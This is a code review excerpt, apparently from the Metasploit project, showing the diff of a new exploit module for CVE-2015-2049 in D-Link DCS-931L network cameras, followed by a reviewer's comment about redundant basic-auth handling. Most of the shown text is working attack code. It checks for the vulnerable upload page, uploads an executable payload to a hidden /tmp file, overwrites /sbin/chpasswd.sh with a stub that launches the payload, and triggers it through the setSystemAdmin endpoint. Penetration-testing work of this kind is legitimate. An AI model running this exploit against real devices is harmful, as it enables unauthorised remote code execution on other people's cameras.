modules/exploits/linux/http/dlink_dcs931l_upload.rb

```diff
@@ -0,0 +1,196 @@
+      'DefaultTarget' => 0,
+      'References' =>
+        [
+          [ 'CVE', '2015-2049' ],
+          [ 'URL', 'https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities' ],
+          [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049' ] # Vendor advisory
+        ],
+      'DisclosureDate' => 'Feb 23 2015'))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'Camera username', 'admin']),
+        OptString.new('PASSWORD',  [false, 'Camera password (default: blank)', ''])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri('uploadfile.htm'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']))
+    if !res
+      return Exploit::CheckCode::Unknown
+    elsif res && res.code && res.code == 404
+      vprint_status("#{peer} - uploadfile.htm does not exist")
+      return Exploit::CheckCode::Safe
+    elsif res && res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS-931L"/
+      vprint_error("#{peer} - Authentication failed")
+      return Exploit::CheckCode::Detected
+    elsif res && res.code && res.code == 200 && res.body && res.body =~ /Upload File/
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    payload_path = "/tmp/.#{rand_text_alphanumeric(rand(8) + 5)}"
+
+    # upload payload
+    res = upload(payload_path, generate_payload_exe)
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    elsif res && res.code && res.code == 404
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
+    elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+      print_good("#{peer} - Payload uploaded successfully")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
+    end
+    register_file_for_cleanup(payload_path)
+
+    # overwrite /sbin/chpasswd.sh with stub
+    res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    elsif res && res.code && res.code == 404
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
+    elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+      print_good("#{peer} - Stager uploaded successfully")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
+    end
+
+    # execute payload using stub
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri('setSystemAdmin'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
```

Comment:
This should happen automatically when you use send_request_cgi. Specifically, here:
https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb#L216

If I'm not mistaken, you should be able to safely remove this line, and basic auth should still occur. Can you please confirm?